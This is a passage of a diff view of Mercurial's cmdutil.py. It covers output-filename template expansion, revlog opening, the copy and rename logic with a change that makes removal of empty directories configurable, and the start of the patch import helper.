945
946 >>> _buildfntemplate(b'foo-%b-%n.patch', seqno=0)
946 >>> _buildfntemplate(b'foo-%b-%n.patch', seqno=0)
947 'foo-{reporoot|basename}-{seqno}.patch'
947 'foo-{reporoot|basename}-{seqno}.patch'
948 >>> _buildfntemplate(b'%R{tags % "{tag}"}%H')
948 >>> _buildfntemplate(b'%R{tags % "{tag}"}%H')
949 '{rev}{tags % "{tag}"}{node}'
949 '{rev}{tags % "{tag}"}{node}'
950
950
951 '\' in outermost strings has to be escaped because it is a directory
951 '\' in outermost strings has to be escaped because it is a directory
952 separator on Windows:
952 separator on Windows:
953
953
954 >>> _buildfntemplate(b'c:\\tmp\\%R\\%n.patch', seqno=0)
954 >>> _buildfntemplate(b'c:\\tmp\\%R\\%n.patch', seqno=0)
955 'c:\\\\tmp\\\\{rev}\\\\{seqno}.patch'
955 'c:\\\\tmp\\\\{rev}\\\\{seqno}.patch'
956 >>> _buildfntemplate(b'\\\\foo\\bar.patch')
956 >>> _buildfntemplate(b'\\\\foo\\bar.patch')
957 '\\\\\\\\foo\\\\bar.patch'
957 '\\\\\\\\foo\\\\bar.patch'
958 >>> _buildfntemplate(b'\\{tags % "{tag}"}')
958 >>> _buildfntemplate(b'\\{tags % "{tag}"}')
959 '\\\\{tags % "{tag}"}'
959 '\\\\{tags % "{tag}"}'
960
960
961 but inner strings follow the template rules (i.e. '\' is taken as an
961 but inner strings follow the template rules (i.e. '\' is taken as an
962 escape character):
962 escape character):
963
963
964 >>> _buildfntemplate(br'{"c:\tmp"}', seqno=0)
964 >>> _buildfntemplate(br'{"c:\tmp"}', seqno=0)
965 '{"c:\\tmp"}'
965 '{"c:\\tmp"}'
966 """
966 """
967 expander = {
967 expander = {
968 b'H': b'{node}',
968 b'H': b'{node}',
969 b'R': b'{rev}',
969 b'R': b'{rev}',
970 b'h': b'{node|short}',
970 b'h': b'{node|short}',
971 b'm': br'{sub(r"[^\w]", "_", desc|firstline)}',
971 b'm': br'{sub(r"[^\w]", "_", desc|firstline)}',
972 b'r': b'{if(revwidth, pad(rev, revwidth, "0", left=True), rev)}',
972 b'r': b'{if(revwidth, pad(rev, revwidth, "0", left=True), rev)}',
973 b'%': b'%',
973 b'%': b'%',
974 b'b': b'{reporoot|basename}',
974 b'b': b'{reporoot|basename}',
975 }
975 }
976 if total is not None:
976 if total is not None:
977 expander[b'N'] = b'{total}'
977 expander[b'N'] = b'{total}'
978 if seqno is not None:
978 if seqno is not None:
979 expander[b'n'] = b'{seqno}'
979 expander[b'n'] = b'{seqno}'
980 if total is not None and seqno is not None:
980 if total is not None and seqno is not None:
981 expander[b'n'] = b'{pad(seqno, total|stringify|count, "0", left=True)}'
981 expander[b'n'] = b'{pad(seqno, total|stringify|count, "0", left=True)}'
982 if pathname is not None:
982 if pathname is not None:
983 expander[b's'] = b'{pathname|basename}'
983 expander[b's'] = b'{pathname|basename}'
984 expander[b'd'] = b'{if(pathname|dirname, pathname|dirname, ".")}'
984 expander[b'd'] = b'{if(pathname|dirname, pathname|dirname, ".")}'
985 expander[b'p'] = b'{pathname}'
985 expander[b'p'] = b'{pathname}'
986
986
987 newname = []
987 newname = []
988 for typ, start, end in templater.scantemplate(pat, raw=True):
988 for typ, start, end in templater.scantemplate(pat, raw=True):
989 if typ != b'string':
989 if typ != b'string':
990 newname.append(pat[start:end])
990 newname.append(pat[start:end])
991 continue
991 continue
992 i = start
992 i = start
993 while i < end:
993 while i < end:
994 n = pat.find(b'%', i, end)
994 n = pat.find(b'%', i, end)
995 if n < 0:
995 if n < 0:
996 newname.append(stringutil.escapestr(pat[i:end]))
996 newname.append(stringutil.escapestr(pat[i:end]))
997 break
997 break
998 newname.append(stringutil.escapestr(pat[i:n]))
998 newname.append(stringutil.escapestr(pat[i:n]))
999 if n + 2 > end:
999 if n + 2 > end:
1000 raise error.Abort(_("incomplete format spec in output "
1000 raise error.Abort(_("incomplete format spec in output "
1001 "filename"))
1001 "filename"))
1002 c = pat[n + 1:n + 2]
1002 c = pat[n + 1:n + 2]
1003 i = n + 2
1003 i = n + 2
1004 try:
1004 try:
1005 newname.append(expander[c])
1005 newname.append(expander[c])
1006 except KeyError:
1006 except KeyError:
1007 raise error.Abort(_("invalid format spec '%%%s' in output "
1007 raise error.Abort(_("invalid format spec '%%%s' in output "
1008 "filename") % c)
1008 "filename") % c)
1009 return ''.join(newname)
1009 return ''.join(newname)
1010
1010
1011 def makefilename(ctx, pat, **props):
1011 def makefilename(ctx, pat, **props):
1012 if not pat:
1012 if not pat:
1013 return pat
1013 return pat
1014 tmpl = _buildfntemplate(pat, **props)
1014 tmpl = _buildfntemplate(pat, **props)
1015 # BUG: alias expansion shouldn't be made against template fragments
1015 # BUG: alias expansion shouldn't be made against template fragments
1016 # rewritten from %-format strings, but we have no easy way to partially
1016 # rewritten from %-format strings, but we have no easy way to partially
1017 # disable the expansion.
1017 # disable the expansion.
1018 return rendertemplate(ctx, tmpl, pycompat.byteskwargs(props))
1018 return rendertemplate(ctx, tmpl, pycompat.byteskwargs(props))
1019
1019
1020 def isstdiofilename(pat):
1020 def isstdiofilename(pat):
1021 """True if the given pat looks like a filename denoting stdin/stdout"""
1021 """True if the given pat looks like a filename denoting stdin/stdout"""
1022 return not pat or pat == '-'
1022 return not pat or pat == '-'
1023
1023
1024 class _unclosablefile(object):
1024 class _unclosablefile(object):
1025 def __init__(self, fp):
1025 def __init__(self, fp):
1026 self._fp = fp
1026 self._fp = fp
1027
1027
1028 def close(self):
1028 def close(self):
1029 pass
1029 pass
1030
1030
1031 def __iter__(self):
1031 def __iter__(self):
1032 return iter(self._fp)
1032 return iter(self._fp)
1033
1033
1034 def __getattr__(self, attr):
1034 def __getattr__(self, attr):
1035 return getattr(self._fp, attr)
1035 return getattr(self._fp, attr)
1036
1036
1037 def __enter__(self):
1037 def __enter__(self):
1038 return self
1038 return self
1039
1039
1040 def __exit__(self, exc_type, exc_value, exc_tb):
1040 def __exit__(self, exc_type, exc_value, exc_tb):
1041 pass
1041 pass
1042
1042
1043 def makefileobj(ctx, pat, mode='wb', **props):
1043 def makefileobj(ctx, pat, mode='wb', **props):
1044 writable = mode not in ('r', 'rb')
1044 writable = mode not in ('r', 'rb')
1045
1045
1046 if isstdiofilename(pat):
1046 if isstdiofilename(pat):
1047 repo = ctx.repo()
1047 repo = ctx.repo()
1048 if writable:
1048 if writable:
1049 fp = repo.ui.fout
1049 fp = repo.ui.fout
1050 else:
1050 else:
1051 fp = repo.ui.fin
1051 fp = repo.ui.fin
1052 return _unclosablefile(fp)
1052 return _unclosablefile(fp)
1053 fn = makefilename(ctx, pat, **props)
1053 fn = makefilename(ctx, pat, **props)
1054 return open(fn, mode)
1054 return open(fn, mode)
1055
1055
1056 def openrevlog(repo, cmd, file_, opts):
1056 def openrevlog(repo, cmd, file_, opts):
1057 """opens the changelog, manifest, a filelog or a given revlog"""
1057 """opens the changelog, manifest, a filelog or a given revlog"""
1058 cl = opts['changelog']
1058 cl = opts['changelog']
1059 mf = opts['manifest']
1059 mf = opts['manifest']
1060 dir = opts['dir']
1060 dir = opts['dir']
1061 msg = None
1061 msg = None
1062 if cl and mf:
1062 if cl and mf:
1063 msg = _('cannot specify --changelog and --manifest at the same time')
1063 msg = _('cannot specify --changelog and --manifest at the same time')
1064 elif cl and dir:
1064 elif cl and dir:
1065 msg = _('cannot specify --changelog and --dir at the same time')
1065 msg = _('cannot specify --changelog and --dir at the same time')
1066 elif cl or mf or dir:
1066 elif cl or mf or dir:
1067 if file_:
1067 if file_:
1068 msg = _('cannot specify filename with --changelog or --manifest')
1068 msg = _('cannot specify filename with --changelog or --manifest')
1069 elif not repo:
1069 elif not repo:
1070 msg = _('cannot specify --changelog or --manifest or --dir '
1070 msg = _('cannot specify --changelog or --manifest or --dir '
1071 'without a repository')
1071 'without a repository')
1072 if msg:
1072 if msg:
1073 raise error.Abort(msg)
1073 raise error.Abort(msg)
1074
1074
1075 r = None
1075 r = None
1076 if repo:
1076 if repo:
1077 if cl:
1077 if cl:
1078 r = repo.unfiltered().changelog
1078 r = repo.unfiltered().changelog
1079 elif dir:
1079 elif dir:
1080 if 'treemanifest' not in repo.requirements:
1080 if 'treemanifest' not in repo.requirements:
1081 raise error.Abort(_("--dir can only be used on repos with "
1081 raise error.Abort(_("--dir can only be used on repos with "
1082 "treemanifest enabled"))
1082 "treemanifest enabled"))
1083 if not dir.endswith('/'):
1083 if not dir.endswith('/'):
1084 dir = dir + '/'
1084 dir = dir + '/'
1085 dirlog = repo.manifestlog._revlog.dirlog(dir)
1085 dirlog = repo.manifestlog._revlog.dirlog(dir)
1086 if len(dirlog):
1086 if len(dirlog):
1087 r = dirlog
1087 r = dirlog
1088 elif mf:
1088 elif mf:
1089 r = repo.manifestlog._revlog
1089 r = repo.manifestlog._revlog
1090 elif file_:
1090 elif file_:
1091 filelog = repo.file(file_)
1091 filelog = repo.file(file_)
1092 if len(filelog):
1092 if len(filelog):
1093 r = filelog
1093 r = filelog
1094 if not r:
1094 if not r:
1095 if not file_:
1095 if not file_:
1096 raise error.CommandError(cmd, _('invalid arguments'))
1096 raise error.CommandError(cmd, _('invalid arguments'))
1097 if not os.path.isfile(file_):
1097 if not os.path.isfile(file_):
1098 raise error.Abort(_("revlog '%s' not found") % file_)
1098 raise error.Abort(_("revlog '%s' not found") % file_)
1099 r = revlog.revlog(vfsmod.vfs(pycompat.getcwd(), audit=False),
1099 r = revlog.revlog(vfsmod.vfs(pycompat.getcwd(), audit=False),
1100 file_[:-2] + ".i")
1100 file_[:-2] + ".i")
1101 return r
1101 return r
1102
1102
1103 def copy(ui, repo, pats, opts, rename=False):
1103 def copy(ui, repo, pats, opts, rename=False):
1104 # called with the repo lock held
1104 # called with the repo lock held
1105 #
1105 #
1106 # hgsep => pathname that uses "/" to separate directories
1106 # hgsep => pathname that uses "/" to separate directories
1107 # ossep => pathname that uses os.sep to separate directories
1107 # ossep => pathname that uses os.sep to separate directories
1108 cwd = repo.getcwd()
1108 cwd = repo.getcwd()
1109 targets = {}
1109 targets = {}
1110 after = opts.get("after")
1110 after = opts.get("after")
1111 dryrun = opts.get("dry_run")
1111 dryrun = opts.get("dry_run")
1112 wctx = repo[None]
1112 wctx = repo[None]
1113
1113
1114 def walkpat(pat):
1114 def walkpat(pat):
1115 srcs = []
1115 srcs = []
1116 if after:
1116 if after:
1117 badstates = '?'
1117 badstates = '?'
1118 else:
1118 else:
1119 badstates = '?r'
1119 badstates = '?r'
1120 m = scmutil.match(wctx, [pat], opts, globbed=True)
1120 m = scmutil.match(wctx, [pat], opts, globbed=True)
1121 for abs in wctx.walk(m):
1121 for abs in wctx.walk(m):
1122 state = repo.dirstate[abs]
1122 state = repo.dirstate[abs]
1123 rel = m.rel(abs)
1123 rel = m.rel(abs)
1124 exact = m.exact(abs)
1124 exact = m.exact(abs)
1125 if state in badstates:
1125 if state in badstates:
1126 if exact and state == '?':
1126 if exact and state == '?':
1127 ui.warn(_('%s: not copying - file is not managed\n') % rel)
1127 ui.warn(_('%s: not copying - file is not managed\n') % rel)
1128 if exact and state == 'r':
1128 if exact and state == 'r':
1129 ui.warn(_('%s: not copying - file has been marked for'
1129 ui.warn(_('%s: not copying - file has been marked for'
1130 ' remove\n') % rel)
1130 ' remove\n') % rel)
1131 continue
1131 continue
1132 # abs: hgsep
1132 # abs: hgsep
1133 # rel: ossep
1133 # rel: ossep
1134 srcs.append((abs, rel, exact))
1134 srcs.append((abs, rel, exact))
1135 return srcs
1135 return srcs
1136
1136
1137 # abssrc: hgsep
1137 # abssrc: hgsep
1138 # relsrc: ossep
1138 # relsrc: ossep
1139 # otarget: ossep
1139 # otarget: ossep
1140 def copyfile(abssrc, relsrc, otarget, exact):
1140 def copyfile(abssrc, relsrc, otarget, exact):
1141 abstarget = pathutil.canonpath(repo.root, cwd, otarget)
1141 abstarget = pathutil.canonpath(repo.root, cwd, otarget)
1142 if '/' in abstarget:
1142 if '/' in abstarget:
1143 # We cannot normalize abstarget itself, this would prevent
1143 # We cannot normalize abstarget itself, this would prevent
1144 # case only renames, like a => A.
1144 # case only renames, like a => A.
1145 abspath, absname = abstarget.rsplit('/', 1)
1145 abspath, absname = abstarget.rsplit('/', 1)
1146 abstarget = repo.dirstate.normalize(abspath) + '/' + absname
1146 abstarget = repo.dirstate.normalize(abspath) + '/' + absname
1147 reltarget = repo.pathto(abstarget, cwd)
1147 reltarget = repo.pathto(abstarget, cwd)
1148 target = repo.wjoin(abstarget)
1148 target = repo.wjoin(abstarget)
1149 src = repo.wjoin(abssrc)
1149 src = repo.wjoin(abssrc)
1150 state = repo.dirstate[abstarget]
1150 state = repo.dirstate[abstarget]
1151
1151
1152 scmutil.checkportable(ui, abstarget)
1152 scmutil.checkportable(ui, abstarget)
1153
1153
1154 # check for collisions
1154 # check for collisions
1155 prevsrc = targets.get(abstarget)
1155 prevsrc = targets.get(abstarget)
1156 if prevsrc is not None:
1156 if prevsrc is not None:
1157 ui.warn(_('%s: not overwriting - %s collides with %s\n') %
1157 ui.warn(_('%s: not overwriting - %s collides with %s\n') %
1158 (reltarget, repo.pathto(abssrc, cwd),
1158 (reltarget, repo.pathto(abssrc, cwd),
1159 repo.pathto(prevsrc, cwd)))
1159 repo.pathto(prevsrc, cwd)))
1160 return
1160 return
1161
1161
1162 # check for overwrites
1162 # check for overwrites
1163 exists = os.path.lexists(target)
1163 exists = os.path.lexists(target)
1164 samefile = False
1164 samefile = False
1165 if exists and abssrc != abstarget:
1165 if exists and abssrc != abstarget:
1166 if (repo.dirstate.normalize(abssrc) ==
1166 if (repo.dirstate.normalize(abssrc) ==
1167 repo.dirstate.normalize(abstarget)):
1167 repo.dirstate.normalize(abstarget)):
1168 if not rename:
1168 if not rename:
1169 ui.warn(_("%s: can't copy - same file\n") % reltarget)
1169 ui.warn(_("%s: can't copy - same file\n") % reltarget)
1170 return
1170 return
1171 exists = False
1171 exists = False
1172 samefile = True
1172 samefile = True
1173
1173
1174 if not after and exists or after and state in 'mn':
1174 if not after and exists or after and state in 'mn':
1175 if not opts['force']:
1175 if not opts['force']:
1176 if state in 'mn':
1176 if state in 'mn':
1177 msg = _('%s: not overwriting - file already committed\n')
1177 msg = _('%s: not overwriting - file already committed\n')
1178 if after:
1178 if after:
1179 flags = '--after --force'
1179 flags = '--after --force'
1180 else:
1180 else:
1181 flags = '--force'
1181 flags = '--force'
1182 if rename:
1182 if rename:
1183 hint = _('(hg rename %s to replace the file by '
1183 hint = _('(hg rename %s to replace the file by '
1184 'recording a rename)\n') % flags
1184 'recording a rename)\n') % flags
1185 else:
1185 else:
1186 hint = _('(hg copy %s to replace the file by '
1186 hint = _('(hg copy %s to replace the file by '
1187 'recording a copy)\n') % flags
1187 'recording a copy)\n') % flags
1188 else:
1188 else:
1189 msg = _('%s: not overwriting - file exists\n')
1189 msg = _('%s: not overwriting - file exists\n')
1190 if rename:
1190 if rename:
1191 hint = _('(hg rename --after to record the rename)\n')
1191 hint = _('(hg rename --after to record the rename)\n')
1192 else:
1192 else:
1193 hint = _('(hg copy --after to record the copy)\n')
1193 hint = _('(hg copy --after to record the copy)\n')
1194 ui.warn(msg % reltarget)
1194 ui.warn(msg % reltarget)
1195 ui.warn(hint)
1195 ui.warn(hint)
1196 return
1196 return
1197
1197
1198 if after:
1198 if after:
1199 if not exists:
1199 if not exists:
1200 if rename:
1200 if rename:
1201 ui.warn(_('%s: not recording move - %s does not exist\n') %
1201 ui.warn(_('%s: not recording move - %s does not exist\n') %
1202 (relsrc, reltarget))
1202 (relsrc, reltarget))
1203 else:
1203 else:
1204 ui.warn(_('%s: not recording copy - %s does not exist\n') %
1204 ui.warn(_('%s: not recording copy - %s does not exist\n') %
1205 (relsrc, reltarget))
1205 (relsrc, reltarget))
1206 return
1206 return
1207 elif not dryrun:
1207 elif not dryrun:
1208 try:
1208 try:
1209 if exists:
1209 if exists:
1210 os.unlink(target)
1210 os.unlink(target)
1211 targetdir = os.path.dirname(target) or '.'
1211 targetdir = os.path.dirname(target) or '.'
1212 if not os.path.isdir(targetdir):
1212 if not os.path.isdir(targetdir):
1213 os.makedirs(targetdir)
1213 os.makedirs(targetdir)
1214 if samefile:
1214 if samefile:
1215 tmp = target + "~hgrename"
1215 tmp = target + "~hgrename"
1216 os.rename(src, tmp)
1216 os.rename(src, tmp)
1217 os.rename(tmp, target)
1217 os.rename(tmp, target)
1218 else:
1218 else:
1219 # Preserve stat info on renames, not on copies; this matches
1219 # Preserve stat info on renames, not on copies; this matches
1220 # Linux CLI behavior.
1220 # Linux CLI behavior.
1221 util.copyfile(src, target, copystat=rename)
1221 util.copyfile(src, target, copystat=rename)
1222 srcexists = True
1222 srcexists = True
1223 except IOError as inst:
1223 except IOError as inst:
1224 if inst.errno == errno.ENOENT:
1224 if inst.errno == errno.ENOENT:
1225 ui.warn(_('%s: deleted in working directory\n') % relsrc)
1225 ui.warn(_('%s: deleted in working directory\n') % relsrc)
1226 srcexists = False
1226 srcexists = False
1227 else:
1227 else:
1228 ui.warn(_('%s: cannot copy - %s\n') %
1228 ui.warn(_('%s: cannot copy - %s\n') %
1229 (relsrc, encoding.strtolocal(inst.strerror)))
1229 (relsrc, encoding.strtolocal(inst.strerror)))
1230 return True # report a failure
1230 return True # report a failure
1231
1231
1232 if ui.verbose or not exact:
1232 if ui.verbose or not exact:
1233 if rename:
1233 if rename:
1234 ui.status(_('moving %s to %s\n') % (relsrc, reltarget))
1234 ui.status(_('moving %s to %s\n') % (relsrc, reltarget))
1235 else:
1235 else:
1236 ui.status(_('copying %s to %s\n') % (relsrc, reltarget))
1236 ui.status(_('copying %s to %s\n') % (relsrc, reltarget))
1237
1237
1238 targets[abstarget] = abssrc
1238 targets[abstarget] = abssrc
1239
1239
1240 # fix up dirstate
1240 # fix up dirstate
1241 scmutil.dirstatecopy(ui, repo, wctx, abssrc, abstarget,
1241 scmutil.dirstatecopy(ui, repo, wctx, abssrc, abstarget,
1242 dryrun=dryrun, cwd=cwd)
1242 dryrun=dryrun, cwd=cwd)
1243 if rename and not dryrun:
1243 if rename and not dryrun:
1244 if not after and srcexists and not samefile:
1244 if not after and srcexists and not samefile:
1245 repo.wvfs.unlinkpath(abssrc)
1245 rmdir = repo.ui.configbool('experimental', 'removeemptydirs')
1246 repo.wvfs.unlinkpath(abssrc, rmdir=rmdir)
1246 wctx.forget([abssrc])
1247 wctx.forget([abssrc])
1247
1248
1248 # pat: ossep
1249 # pat: ossep
1249 # dest ossep
1250 # dest ossep
1250 # srcs: list of (hgsep, hgsep, ossep, bool)
1251 # srcs: list of (hgsep, hgsep, ossep, bool)
1251 # return: function that takes hgsep and returns ossep
1252 # return: function that takes hgsep and returns ossep
1252 def targetpathfn(pat, dest, srcs):
1253 def targetpathfn(pat, dest, srcs):
1253 if os.path.isdir(pat):
1254 if os.path.isdir(pat):
1254 abspfx = pathutil.canonpath(repo.root, cwd, pat)
1255 abspfx = pathutil.canonpath(repo.root, cwd, pat)
1255 abspfx = util.localpath(abspfx)
1256 abspfx = util.localpath(abspfx)
1256 if destdirexists:
1257 if destdirexists:
1257 striplen = len(os.path.split(abspfx)[0])
1258 striplen = len(os.path.split(abspfx)[0])
1258 else:
1259 else:
1259 striplen = len(abspfx)
1260 striplen = len(abspfx)
1260 if striplen:
1261 if striplen:
1261 striplen += len(pycompat.ossep)
1262 striplen += len(pycompat.ossep)
1262 res = lambda p: os.path.join(dest, util.localpath(p)[striplen:])
1263 res = lambda p: os.path.join(dest, util.localpath(p)[striplen:])
1263 elif destdirexists:
1264 elif destdirexists:
1264 res = lambda p: os.path.join(dest,
1265 res = lambda p: os.path.join(dest,
1265 os.path.basename(util.localpath(p)))
1266 os.path.basename(util.localpath(p)))
1266 else:
1267 else:
1267 res = lambda p: dest
1268 res = lambda p: dest
1268 return res
1269 return res
1269
1270
1270 # pat: ossep
1271 # pat: ossep
1271 # dest ossep
1272 # dest ossep
1272 # srcs: list of (hgsep, hgsep, ossep, bool)
1273 # srcs: list of (hgsep, hgsep, ossep, bool)
1273 # return: function that takes hgsep and returns ossep
1274 # return: function that takes hgsep and returns ossep
1274 def targetpathafterfn(pat, dest, srcs):
1275 def targetpathafterfn(pat, dest, srcs):
1275 if matchmod.patkind(pat):
1276 if matchmod.patkind(pat):
1276 # a mercurial pattern
1277 # a mercurial pattern
1277 res = lambda p: os.path.join(dest,
1278 res = lambda p: os.path.join(dest,
1278 os.path.basename(util.localpath(p)))
1279 os.path.basename(util.localpath(p)))
1279 else:
1280 else:
1280 abspfx = pathutil.canonpath(repo.root, cwd, pat)
1281 abspfx = pathutil.canonpath(repo.root, cwd, pat)
1281 if len(abspfx) < len(srcs[0][0]):
1282 if len(abspfx) < len(srcs[0][0]):
1282 # A directory. Either the target path contains the last
1283 # A directory. Either the target path contains the last
1283 # component of the source path or it does not.
1284 # component of the source path or it does not.
1284 def evalpath(striplen):
1285 def evalpath(striplen):
1285 score = 0
1286 score = 0
1286 for s in srcs:
1287 for s in srcs:
1287 t = os.path.join(dest, util.localpath(s[0])[striplen:])
1288 t = os.path.join(dest, util.localpath(s[0])[striplen:])
1288 if os.path.lexists(t):
1289 if os.path.lexists(t):
1289 score += 1
1290 score += 1
1290 return score
1291 return score
1291
1292
1292 abspfx = util.localpath(abspfx)
1293 abspfx = util.localpath(abspfx)
1293 striplen = len(abspfx)
1294 striplen = len(abspfx)
1294 if striplen:
1295 if striplen:
1295 striplen += len(pycompat.ossep)
1296 striplen += len(pycompat.ossep)
1296 if os.path.isdir(os.path.join(dest, os.path.split(abspfx)[1])):
1297 if os.path.isdir(os.path.join(dest, os.path.split(abspfx)[1])):
1297 score = evalpath(striplen)
1298 score = evalpath(striplen)
1298 striplen1 = len(os.path.split(abspfx)[0])
1299 striplen1 = len(os.path.split(abspfx)[0])
1299 if striplen1:
1300 if striplen1:
1300 striplen1 += len(pycompat.ossep)
1301 striplen1 += len(pycompat.ossep)
1301 if evalpath(striplen1) > score:
1302 if evalpath(striplen1) > score:
1302 striplen = striplen1
1303 striplen = striplen1
1303 res = lambda p: os.path.join(dest,
1304 res = lambda p: os.path.join(dest,
1304 util.localpath(p)[striplen:])
1305 util.localpath(p)[striplen:])
1305 else:
1306 else:
1306 # a file
1307 # a file
1307 if destdirexists:
1308 if destdirexists:
1308 res = lambda p: os.path.join(dest,
1309 res = lambda p: os.path.join(dest,
1309 os.path.basename(util.localpath(p)))
1310 os.path.basename(util.localpath(p)))
1310 else:
1311 else:
1311 res = lambda p: dest
1312 res = lambda p: dest
1312 return res
1313 return res
1313
1314
1314 pats = scmutil.expandpats(pats)
1315 pats = scmutil.expandpats(pats)
1315 if not pats:
1316 if not pats:
1316 raise error.Abort(_('no source or destination specified'))
1317 raise error.Abort(_('no source or destination specified'))
1317 if len(pats) == 1:
1318 if len(pats) == 1:
1318 raise error.Abort(_('no destination specified'))
1319 raise error.Abort(_('no destination specified'))
1319 dest = pats.pop()
1320 dest = pats.pop()
1320 destdirexists = os.path.isdir(dest) and not os.path.islink(dest)
1321 destdirexists = os.path.isdir(dest) and not os.path.islink(dest)
1321 if not destdirexists:
1322 if not destdirexists:
1322 if len(pats) > 1 or matchmod.patkind(pats[0]):
1323 if len(pats) > 1 or matchmod.patkind(pats[0]):
1323 raise error.Abort(_('with multiple sources, destination must be an '
1324 raise error.Abort(_('with multiple sources, destination must be an '
1324 'existing directory'))
1325 'existing directory'))
1325 if util.endswithsep(dest):
1326 if util.endswithsep(dest):
1326 raise error.Abort(_('destination %s is not a directory') % dest)
1327 raise error.Abort(_('destination %s is not a directory') % dest)
1327
1328
1328 tfn = targetpathfn
1329 tfn = targetpathfn
1329 if after:
1330 if after:
1330 tfn = targetpathafterfn
1331 tfn = targetpathafterfn
1331 copylist = []
1332 copylist = []
1332 for pat in pats:
1333 for pat in pats:
1333 srcs = walkpat(pat)
1334 srcs = walkpat(pat)
1334 if not srcs:
1335 if not srcs:
1335 continue
1336 continue
1336 copylist.append((tfn(pat, dest, srcs), srcs))
1337 copylist.append((tfn(pat, dest, srcs), srcs))
1337 if not copylist:
1338 if not copylist:
1338 raise error.Abort(_('no files to copy'))
1339 raise error.Abort(_('no files to copy'))
1339
1340
1340 errors = 0
1341 errors = 0
1341 for targetpath, srcs in copylist:
1342 for targetpath, srcs in copylist:
1342 for abssrc, relsrc, exact in srcs:
1343 for abssrc, relsrc, exact in srcs:
1343 if copyfile(abssrc, relsrc, targetpath(abssrc), exact):
1344 if copyfile(abssrc, relsrc, targetpath(abssrc), exact):
1344 errors += 1
1345 errors += 1
1345
1346
1346 if errors:
1347 if errors:
1347 ui.warn(_('(consider using --after)\n'))
1348 ui.warn(_('(consider using --after)\n'))
1348
1349
1349 return errors != 0
1350 return errors != 0
1350
1351
1351 ## facility to let extension process additional data into an import patch
1352 ## facility to let extension process additional data into an import patch
1352 # list of identifier to be executed in order
1353 # list of identifier to be executed in order
1353 extrapreimport = [] # run before commit
1354 extrapreimport = [] # run before commit
1354 extrapostimport = [] # run after commit
1355 extrapostimport = [] # run after commit
1355 # mapping from identifier to actual import function
1356 # mapping from identifier to actual import function
1356 #
1357 #
1357 # 'preimport' are run before the commit is made and are provided the following
1358 # 'preimport' are run before the commit is made and are provided the following
1358 # arguments:
1359 # arguments:
1359 # - repo: the localrepository instance,
1360 # - repo: the localrepository instance,
1360 # - patchdata: data extracted from patch header (cf m.patch.patchheadermap),
1361 # - patchdata: data extracted from patch header (cf m.patch.patchheadermap),
1361 # - extra: the future extra dictionary of the changeset, please mutate it,
1362 # - extra: the future extra dictionary of the changeset, please mutate it,
1362 # - opts: the import options.
1363 # - opts: the import options.
1363 # XXX ideally, we would just pass an ctx ready to be computed, that would allow
1364 # XXX ideally, we would just pass an ctx ready to be computed, that would allow
1364 # mutation of in memory commit and more. Feel free to rework the code to get
1365 # mutation of in memory commit and more. Feel free to rework the code to get
1365 # there.
1366 # there.
1366 extrapreimportmap = {}
1367 extrapreimportmap = {}
1367 # 'postimport' are run after the commit is made and are provided the following
1368 # 'postimport' are run after the commit is made and are provided the following
1368 # argument:
1369 # argument:
1369 # - ctx: the changectx created by import.
1370 # - ctx: the changectx created by import.
1370 extrapostimportmap = {}
1371 extrapostimportmap = {}
1371
1372
1372 def tryimportone(ui, repo, patchdata, parents, opts, msgs, updatefunc):
1373 def tryimportone(ui, repo, patchdata, parents, opts, msgs, updatefunc):
1373 """Utility function used by commands.import to import a single patch
1374 """Utility function used by commands.import to import a single patch
1374
1375
1375 This function is explicitly defined here to help the evolve extension to
1376 This function is explicitly defined here to help the evolve extension to
1376 wrap this part of the import logic.
1377 wrap this part of the import logic.
1377
1378
1378 The API is currently a bit ugly because it a simple code translation from
1379 The API is currently a bit ugly because it a simple code translation from
1379 the import command. Feel free to make it better.
1380 the import command. Feel free to make it better.
1380
1381
1381 :patchdata: a dictionary containing parsed patch data (such as from
1382 :patchdata: a dictionary containing parsed patch data (such as from
1382 ``patch.extract()``)
1383 ``patch.extract()``)
1383 :parents: nodes that will be parent of the created commit
1384 :parents: nodes that will be parent of the created commit
1384 :opts: the full dict of option passed to the import command
1385 :opts: the full dict of option passed to the import command
1385 :msgs: list to save commit message to.
1386 :msgs: list to save commit message to.
1386 (used in case we need to save it when failing)
1387 (used in case we need to save it when failing)
1387 :updatefunc: a function that update a repo to a given node
1388 :updatefunc: a function that update a repo to a given node
1388 updatefunc(<repo>, <node>)
1389 updatefunc(<repo>, <node>)
1389 """
1390 """
1390 # avoid cycle context -> subrepo -> cmdutil
1391 # avoid cycle context -> subrepo -> cmdutil
1391 from . import context
1392 from . import context
1392
1393
1393 tmpname = patchdata.get('filename')
1394 tmpname = patchdata.get('filename')
1394 message = patchdata.get('message')
1395 message = patchdata.get('message')
1395 user = opts.get('user') or patchdata.get('user')
1396 user = opts.get('user') or patchdata.get('user')
1396 date = opts.get('date') or patchdata.get('date')
1397 date = opts.get('date') or patchdata.get('date')
1397 branch = patchdata.get('branch')
1398 branch = patchdata.get('branch')
1398 nodeid = patchdata.get('nodeid')
1399 nodeid = patchdata.get('nodeid')
1399 p1 = patchdata.get('p1')
1400 p1 = patchdata.get('p1')
1400 p2 = patchdata.get('p2')
1401 p2 = patchdata.get('p2')
1401
1402
1402 nocommit = opts.get('no_commit')
1403 nocommit = opts.get('no_commit')
1403 importbranch = opts.get('import_branch')
1404 importbranch = opts.get('import_branch')
1404 update = not opts.get('bypass')
1405 update = not opts.get('bypass')
1405 strip = opts["strip"]
1406 strip = opts["strip"]
1406 prefix = opts["prefix"]
1407 prefix = opts["prefix"]
1407 sim = float(opts.get('similarity') or 0)
1408 sim = float(opts.get('similarity') or 0)
1408
1409
1409 if not tmpname:
1410 if not tmpname:
1410 return None, None, False
1411 return None, None, False
1411
1412
1412 rejects = False
1413 rejects = False
1413
1414
1414 cmdline_message = logmessage(ui, opts)
1415 cmdline_message = logmessage(ui, opts)
1415 if cmdline_message:
1416 if cmdline_message:
1416 # pickup the cmdline msg
1417 # pickup the cmdline msg
1417 message = cmdline_message
1418 message = cmdline_message
1418 elif message:
1419 elif message:
1419 # pickup the patch msg
1420 # pickup the patch msg
1420 message = message.strip()
1421 message = message.strip()
1421 else:
1422 else:
1422 # launch the editor
1423 # launch the editor
1423 message = None
1424 message = None
1424 ui.debug('message:\n%s\n' % (message or ''))
1425 ui.debug('message:\n%s\n' % (message or ''))
1425
1426
1426 if len(parents) == 1:
1427 if len(parents) == 1:
1427 parents.append(repo[nullid])
1428 parents.append(repo[nullid])
1428 if opts.get('exact'):
1429 if opts.get('exact'):
1429 if not nodeid or not p1:
1430 if not nodeid or not p1:
1430 raise error.Abort(_('not a Mercurial patch'))
1431 raise error.Abort(_('not a Mercurial patch'))
